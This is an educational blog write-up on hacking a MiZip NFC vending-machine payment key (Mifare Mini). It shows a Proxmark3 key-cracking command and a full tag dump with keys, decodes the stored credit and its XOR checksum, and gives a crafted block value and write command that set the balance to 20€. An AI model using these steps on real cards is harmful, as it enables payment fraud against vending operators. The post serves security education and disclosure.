Disclaimer
PLEASE, DO NOT USE WHAT YOU LEARN HERE FOR MALICIOUS ACTS, ONLY DO IT FOR LEARNING PURPOSES / PENTESTING!
You are here to learn; I don’t want to be involved in any malicious act.
Like Uncle Ben said: “With great power comes great responsibility”.
Introduction
Today, we will see how insecure a MiZip is.
You will be surprised by the simplicity of the “attack” we are going to experiment with.
I’ll try to simplify as much as I can; you are free to go further using your Google-fu.
Let’s begin with the theory!
Context
Two weeks ago, I didn’t know anything about NFC!
The company where I am working as an intern gave me a MiZip, a little key that you can reload with coins and then use to pay for your snack / coffee.
I instantly asked myself: “How does it work?”
My only clue was the name of the key.
That’s how I started my investigation!
What’s NFC?
The MiZip uses NFC to communicate with the vending machine… but what is it?
NFC is a proximity-based wireless communication protocol.
It is limited to an extremely short range (less than 10 cm), unlike WiFi or Bluetooth, which are long-range wireless communication protocols.
You can find it in your smartphone, in your credit card, in the badge you use to open your building…
NFC is based on RFID, an older protocol used for the same purpose.
It is used to access office buildings, hotel rooms, etc.
The main difference between these two protocols is their transmission range.
RFID can be used at a maximum distance of 460 meters depending on the power source.
NFC is newer and comes with some features missing from RFID, like the possibility to hold multiple “cards” in one device (virtual cards).
You may ask yourself: “How does it work?”
The idea behind NFC is pretty simple!
There are two actors in an NFC transaction: the NFC tag and the NFC reader.
An NFC reader connects to one NFC tag at a time to exchange encrypted data.
The reader supplies the tag with electricity to get its data.
A smartphone can act as an NFC tag (for contactless payment, for example) and as an NFC reader (what we’ll use today).
Now that you have the theory behind NFC, let’s dig into the MiZip.
What is a MiZip?
Name | MiZip
Tag Type | Mifare Mini
Block Size | 16 bytes
Number of Sectors | 5
Number of Blocks | 20
There are many NFC tag manufacturers; the best known is Mifare from NXP Semiconductors.
The most common Mifare tag is the Mifare Classic (the one we will hack today), but there are also the Mifare Plus, the Mifare Ultralight (broken af) and the Mifare DESFire (still secure today, using 3DES).
The Classic uses a security protocol called CRYPTO1 (which was broken in 2008), made by NXP itself.
The tag is used to store an ID, but it can also store data!
For example, the ID can be used by a transport company to verify whether somebody is allowed to travel, and the data can store the contract (this has been the case in the London Underground).
A tag stores hexadecimal values in a very precise layout.
Values are lined up in sectors composed of several blocks.
The “Mi” in MiZip stands for Mini because it contains a Mifare Mini, which is basically the same as the Classic but “smaller”.
Here you’ll find a comparison between these tags.
How is the Mifare Mini protected?
As I said, the Mifare Mini is a small Mifare Classic.
Each sector of a MIFARE Classic card has two authentication keys: key A and key B.
These two keys, together with the access conditions, are stored in the last block of each sector (the so-called sector trailer).
If we find a way to retrieve keyA or keyB, we’ll be able to read and write on the MiZip!
Well, I think we have enough theory now, let’s hack the MiZip!
I’ll try to find out what is stored in it.
Hacking time!
How to communicate with the MiZip?
Well, it would be interesting to see if we can read what’s in the MiZip when it communicates with the reader!
My research first led me to a free Android app called MCT (Mifare Classic Tool).
It can be used to read, analyze and write an NFC tag.
If your smartphone is NFC-compatible, just put the MiZip on the back of it and a popup will appear.
You’ll then be able to interact with the NFC tag.
Here’s what it looks like:
We are now able to interact with the MiZip.
Let’s see if we can read what’s contained in each sector.
Just tap on “Read Tag” and you’ll see this screen:
Here, you have the choice between 3 wordlists containing known keys.
However, they will not work (they didn’t on mine).
To find your keys, you will need to bruteforce them with something more powerful.
Here comes the Proxmark3!
The Proxmark3 is a hardware tool for RFID & NFC security analysis.
It allows users to read, write, analyze, clone and bruteforce the majority of RFID and NFC cards.
You can buy one for 40€ on AliExpress.
Here is the GitHub repository you will need to consult to set up your Proxmark3.
Once it is ready, plug it into your PC and put your MiZip on it like in the picture above!
Now let’s use the Proxmark script to bruteforce the keys.
Today, we’ll act like script kiddies, so we are going to use the “autopwn” command.
This will try every known attack against the Mifare Mini.
Use the following command:
hf mf autopwn --mini
The result will be stored in some files, and the keys will be shown during the process!
Here are my keys!
As you can see, the attack lasted 313 seconds, about 5 minutes!
To do so, the Proxmark3 used a Hardnested attack.
Let’s read what’s in our MiZip!
We are now able to fully study our MiZip because we have its keys and a dump of each sector.
Values are stored in hexadecimal; I took each block and tried to understand what it means with what I know and some docs:
"blocks": {
"0": "CD1A1C74BF890400C808002000000017", --sector0
"1": "6200488849884A884B88000000000000",
"2": "00000000000000000000000000000000",
"3": "A0A1A2A3A4A5787788C1B4C132439EEF",
"4": "0100003808008001000100000000B102", --sector1
"5": "01000001000080010001000000008001",
"6": "AA020000000000000000000000000000",
"7": "C408465144FF78778830ED584949C455",
"8": "00CB02C9000000000000000000000050", --sector2
"9": "00670265000000000000000000000051",
"10": "55510000000000000000000000000000",
"11": "666FD5435F35787788116F9354E42E35",
"12": "00000000000000000000000000000000", --sector3
"13": "00000000000000000000000000000001",
"14": "55010000000000000000000000000000",
"15": "2F685DDBE11378778800B639DE6C4ADA",
"16": "00000000000000000000000000000000", --sector4
"17": "00000000000000000000000000000001",
"18": "55010000000000000000000000000000",
"19": "FC60AB5B898A78778800AC67EA3D3189"
}
First observations:
- The first 4 bytes (CD1A1C74) represent the ID of the tag.
- Blocks 3, 7, 11, 15 and 19 contain keyA and keyB, separated by 4 bytes called access bytes.
As you can see, the first keyA (A0A1A2A3A4A5) is very easy to guess.
Now, let’s focus on the third sector.
My MiZip contained 6,15€ when I dumped it.
If you look at block number 9, it is possible to retrieve this value.
6702 -> 0267 when you convert it from little-endian, which gives 615 in decimal.
To verify this, I added 1€ to my MiZip using my vending machine and checked the value again.
This means that my credits are stored on the MiZip!
The next byte represents the checksum (the result of a XOR operation between 67 and 02).
On block 9, I also have 51, which is a counter.
It is used to avoid NFC cloning.
What we found:
- 6702 is the amount of credit in little-endian; if you convert 0267 from hex to decimal, you’ll find 615, which means 6,15€.
- 65 is a checksum, the result of a XOR operation between 67 and 02.
- 51 is a counter; if you look closely, the value is repeated on block number 10.
Well, if we modify 6702 with the value we want and append the right checksum, we should be able to create credits!
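To make the decoding above reproducible, here is an added example (my own code, not from the original post, nor from Proxmark3 or MCT) that parses the blocks of the dump shown above: it extracts the UID from block 0, splits a sector trailer into keyA / access bytes / keyB, and decodes a credit block, checking the XOR checksum and the counter mirrored in the next block. The CORRUPTED block is a constructed sample, not from the dump, used only to show the checksum check failing.

```python
from typing import Dict, Tuple

# Blocks copied from the post's Proxmark3 dump (hex, 16 bytes each).
DUMP: Dict[int, str] = {
    0: "CD1A1C74BF890400C808002000000017",
    3: "A0A1A2A3A4A5787788C1B4C132439EEF",
    9: "00670265000000000000000000000051",
    10: "55510000000000000000000000000000",
}
# Constructed sample (NOT from the post): block 9 with a wrong checksum
# byte, to show the consistency check catching corruption.
CORRUPTED = "00670266000000000000000000000051"

def uid(block0_hex: str) -> str:
    """The first 4 bytes of block 0 are the tag UID."""
    return block0_hex[:8].upper()

def is_trailer(block_no: int) -> bool:
    """Mini/Classic sectors are 4 blocks; the last one (3, 7, 11, ...) is the trailer."""
    return block_no % 4 == 3

def parse_trailer(trailer_hex: str) -> Tuple[str, str, str]:
    """Trailer layout: keyA (6 bytes) | access bytes (4 bytes) | keyB (6 bytes)."""
    b = bytes.fromhex(trailer_hex)
    return b[:6].hex().upper(), b[6:10].hex().upper(), b[10:].hex().upper()

def decode_credit(block_hex: str) -> Tuple[int, bool, int]:
    """Decode a credit block as the post describes it:
    bytes 1-2 = amount in cents, little-endian (67 02 -> 0x0267 = 615)
    byte 3    = checksum = byte1 XOR byte2 (0x67 ^ 0x02 = 0x65)
    byte 15   = counter
    Returns (cents, checksum_ok, counter)."""
    b = bytes.fromhex(block_hex)
    if len(b) != 16:
        raise ValueError("a Mifare block is exactly 16 bytes")
    cents = int.from_bytes(b[1:3], "little")
    return cents, (b[1] ^ b[2]) == b[3], b[15]

def counter_matches(block_hex: str, next_block_hex: str) -> bool:
    """The counter in byte 15 is repeated in byte 1 of the following block."""
    return bytes.fromhex(block_hex)[15] == bytes.fromhex(next_block_hex)[1]

if __name__ == "__main__":
    print("UID:", uid(DUMP[0]))
    print("sector 0 trailer (keyA, access, keyB):", parse_trailer(DUMP[3]))
    cents, ok, ctr = decode_credit(DUMP[9])
    print(f"block 9: {cents / 100:.2f} EUR, checksum ok={ok}, counter=0x{ctr:02X}")
```

A two-byte XOR only catches accidental corruption; anyone who can write the block can recompute it, so it is not what protects the balance.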
Bonus: overwriting block number 9
I wanted to know if it is possible to overwrite the ninth block with another value.
Let’s say that I want 20€ on my MiZip, I should write:
00D007D7000000000000000000000051
To do so, with the Proxmark3, I typed the following command:
hf mf wrbl -b -k <2nd sector keyB> -d <block to write>
… and this worked.
Achievement unlocked: I became a big rat!
Because I wear a white hat, I didn’t use this.
Conclusion
As you can see, this attack is simple to reproduce!
Today, we hacked a MiZip, but we could have aimed at another card. That’s why you have to be careful with yours.
My goal is to show you how easy it is for an attacker to play with RFID/NFC tags.
Starting from scratch, it only took me a few hours to understand how to hack it.
I’m sorry if I made mistakes in my explanations, and I would be pleased if you tell me what to correct if you find some!
Some sources
https://github.com/RfidResearchGroup/proxmark3 (this dude is the RFID god)
https://en.wikipedia.org/wiki/Near-field_communication
https://hackmethod.com/hacking-mifare-rfid/?v=11aedd0e4327
https://jurocknsail.github.io/yncrea-rfid/06_mifare-classic-1k-hacking/